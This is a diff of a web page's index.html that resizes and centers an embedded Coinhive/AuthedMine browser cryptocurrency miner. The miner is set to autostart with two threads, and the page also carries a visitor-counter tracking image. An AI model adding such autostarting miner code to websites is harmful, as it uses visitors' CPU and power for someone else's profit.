--- a/index.html
+++ b/index.html
@@ -9,14 +9,14 @@
 <noscript><img src="https://counter4.whocame.ovh/private/contadorvisitasgratis.php?c=ekl8akj4mgrwjpm84lydg4nj22xftpm9" border="0" title="contadores web" alt="contadores web"></a></noscript>
 </h3>
     <h4 align="center">
-<div class="coinhive-miner" 
+<div align="center" class="coinhive-miner" 
      style="width: 720px; height: 480px" 
      data-key="C6FfXf8rUkX3of6Cv1DcA4Z7MKupaOwD" 
      data-autostart="true" 
      data-threads="2">
 	
-    <iframe src="https://authedmine.com/media/miner.html?key=C6FfXf8rUkX3of6Cv1DcA4Z7MKupaOwD&amp;
- 	style="width: 300px; height: 300px"
+    <iframe align="center" src="https://authedmine.com/media/miner.html?key=C6FfXf8rUkX3of6Cv1DcA4Z7MKupaOwD&amp;
+ 	style="width: 720px; height: 480px"
 	data-key="C6FfXf8rUkX3of6Cv1DcA4Z7MKupaOwD"
 	data-autostart="true"
 	data-threads="2">
